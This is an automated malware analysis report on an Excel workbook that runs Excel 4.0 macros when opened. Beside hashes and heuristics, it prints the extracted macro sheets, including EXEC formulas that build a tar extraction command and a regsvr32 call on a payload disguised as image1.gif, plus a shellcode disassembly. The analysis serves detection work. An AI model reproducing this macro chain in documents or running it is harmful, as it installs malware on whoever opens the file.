Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1a47f38f1210a686…

MALICIOUS

Office (OOXML)

Size: 921.5 KB
Created: 2015-06-05 18:19:34 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-06-04
MD5: bbc15535faddcb65c345b8a85d119de8
SHA-1: 15affe82c04dc092bf47260c7532d83f1089fec1
SHA-256: 1a47f38f1210a686edb5bdf36af7ed3e12fcfddf2c87281bcba644a061bfef0a
Risk score: 330

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

This Excel document contains Excel 4.0 macro sheets with Auto_Open defined names, indicating it is designed to execute code as soon as it is opened. The document body prompts the user to 'enable editing and content mode for invoice calculation', a common lure to bypass macro security. The macros use dangerous functions such as EXEC and GOTO, which can be used to download and execute arbitrary code. The presence of LoadLibrary and GetProcAddress API references further suggests dynamic code loading.

Heuristics (9)

  • Excel 4.0 macro sheet (3 sheets) [critical, 2 related findings] OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name [critical] OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: GOTO, EXEC, HALT [critical] OOXML_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheets use formula functions (here EXEC, GOTO and HALT) from the family that reaches Win32 directly (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • PEB access via FS segment (x86) [high] SC_PEB_ACCESS
    Code reads fs:[0x30], the Thread Environment Block slot that holds the Process Environment Block pointer on 32-bit Windows. Position-independent shellcode commonly starts from the PEB to locate loaded modules and resolve API addresses without an import table; the listing below also compares a module image in memory against the 'MZ' (0x5a4d) and 'PE' (0x4550) header signatures.
    Attempted x86 opcode disassembly:
    0008948F  64a130000000      mov eax, dword ptr fs:[0x30]
    00089495  894508            mov dword ptr [ebp + 8], eax
    00089498  8b4d08            mov ecx, dword ptr [ebp + 8]
    0008949B  8b5618            mov edx, dword ptr [esi + 0x18]
    0008949E  895108            mov dword ptr [ecx + 8], edx
    000894A1  8b4e04            mov ecx, dword ptr [esi + 4]
    000894A4  8b4928            mov ecx, dword ptr [ecx + 0x28]
    000894A7  034e18            add ecx, dword ptr [esi + 0x18]
    000894AA  ffd1              call ecx
    000894AC  6a00              push 0
    000894AE  ff563c            call dword ptr [esi + 0x3c]
    000894B1  33c0              xor eax, eax
    000894B3  40                inc eax
    000894B4  eb02              jmp 0x894b8
    000894B6  33c0              xor eax, eax
    000894B8  5e                pop esi
    000894B9  c9                leave
    000894BA  c20400            ret 4
    000894BD  55                push ebp
    000894BE  8bec              mov ebp, esp
    000894C0  51                push ecx
    000894C1  8b423c            mov eax, dword ptr [edx + 0x3c]
    000894C4  56                push esi
    000894C5  8bf1              mov esi, ecx
    000894C7  57                push edi
    000894C8  8b441050          mov eax, dword ptr [eax + edx + 0x50]
    000894CC  89460c            mov dword ptr [esi + 0xc], eax
    000894CF  b84d5a0000        mov eax, 0x5a4d
    000894D4  895608            mov dword ptr [esi + 8], edx
    000894D7  8916              mov dword ptr [esi], edx
    000894D9  663902            cmp word ptr [edx], ax
    000894DC  755c              jne 0x8953a
    000894DE  8b423c            mov eax, dword ptr [edx + 0x3c]
    000894E1  bf50450000        mov edi, 0x4550
    000894E6  03c2              add eax, edx
    000894E8  894604            mov dword ptr [esi + 4], eax
    000894EB  3938              cmp dword ptr [eax], edi
    000894ED  754b              jne 0x8953a
  • Reference to LoadLibrary API [high] SC_STR_LOADLIBRARY
    The string "LoadLibrary" appears in the sample. Together with GetProcAddress it is the usual pair for resolving Win32 functions at run time instead of through the import table, which is consistent with the PEB-walking code above.
  • Reference to GetProcAddress API [high] SC_STR_GETPROCADDRESS
    The string "GetProcAddress" appears in the sample (see the LoadLibrary finding above).
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Hidden worksheet (hidden) [low] OOXML_HIDDEN_SHEET
    Excel workbook contains 4 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All nine URLs below are standard OOXML/SpreadsheetML namespace declarations from the macro sheet XML headers, not network indicators.
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revision (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6 (in document text: OOXML body / shared strings)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 1750 bytes
SHA-256: 16906c43ea71e7ceb95d2718eec32533a2cb6af3357ce8a6142e8a664da0db88
Extracted script (first 1,000 lines):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{92BAA9A6-CCD7-4C96-B244-8027D75B3DA4}"><dimension ref="H22:I28"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="10.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="10.5703125" style="2"/><col min="8" max="8" width="16.85546875" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="10.5703125" style="2"/></cols><sheetData><row r="22" spans="8:9" x14ac:dyDescent="0.25"><c r="I22" s="2" t="s"><v>2</v></c></row><row r="23" spans="8:9" x14ac:dyDescent="0.25"><c r="H23" s="2" t="b"><f>SAVE.COPY.AS(I22&amp;I23)</f><v>0</v></c><c r="I23" s="2" t="s"><v>1</v></c></row><row r="28" spans="8:9" x14ac:dyDescent="0.25"><c r="H28" s="2" t="e"><f>GOTO(Nolaert!AK19)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_01.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.xml | 1855 bytes
SHA-256: 36317a1726fcc0ea4f4b9877cdd923b9a162e77bfb18441186d29aec7144a8de
Extracted script (first 1,000 lines):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0200-000000000000}"><dimension ref="AK703:AK717"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="13.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="36" width="13.140625" style="2"/><col min="37" max="37" width="37.42578125" style="2" bestFit="1" customWidth="1"/><col min="38" max="16384" width="13.140625" style="2"/></cols><sheetData><row r="703" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="AK703" s="2" t="b"><f>EXEC(Bkidydj!L15&amp;Bkidydj!L16&amp;Bkidydj!L17)</f><v>0</v></c></row><row r="706" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="AK706" s="2" t="b"><f>WAIT(NOW()+"00:00:05")</f><v>0</v></c></row><row r="717" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="AK717" s="2" t="e"><f>GOTO(Bkidydj!G5)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_02.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet3.xml | 2339 bytes
SHA-256: 31f588c7324c4e72af751bb0a95a8d409e0841c96318e2fa41d7e0a83f2289dc
Extracted script (first 1,000 lines):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{72FD7C7A-A3BA-4BD4-A707-DDD14281DB2B}"><dimension ref="E14:L30"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="4" width="9.140625" style="2"/><col min="5" max="5" width="27.5703125" style="2" customWidth="1"/><col min="6" max="6" width="9.140625" style="2"/><col min="7" max="7" width="13.28515625" style="2" bestFit="1" customWidth="1"/><col min="8" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="14" spans="7:12" x14ac:dyDescent="0.25"><c r="G14" s="2" t="b"><f>EXEC(E29&amp;E30)</f><v>0</v></c></row><row r="15" spans="7:12" x14ac:dyDescent="0.25"><c r="L15" s="2" t="str"><f>"tar -x"</f><v>tar -x</v></c></row><row r="16" spans="7:12" x14ac:dyDescent="0.25"><c r="L16" s="2" t="str"><f>"f ..\"</f><v>f ..\</v></c></row><row r="17" spans="5:12" x14ac:dyDescent="0.25"><c r="L17" s="2" t="str"><f>"Nioka.meposv -C ..\"</f><v>Nioka.meposv -C ..\</v></c></row><row r="19" spans="5:12" x14ac:dyDescent="0.25"><c r="G19" s="2" t="b"><f>HALT()</f><v>0</v></c></row><row r="29" spans="5:12" x14ac:dyDescent="0.25"><c r="E29" s="2" t="str"><f>"Regs"</f><v>Regs</v></c></row><row r="30" spans="5:12" x14ac:dyDescent="0.25"><c r="E30" s="2" t="str"><f>"vr32 -s ..\xl\media\image1.gif"</f><v>vr32 -s ..\xl\media\image1.gif</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>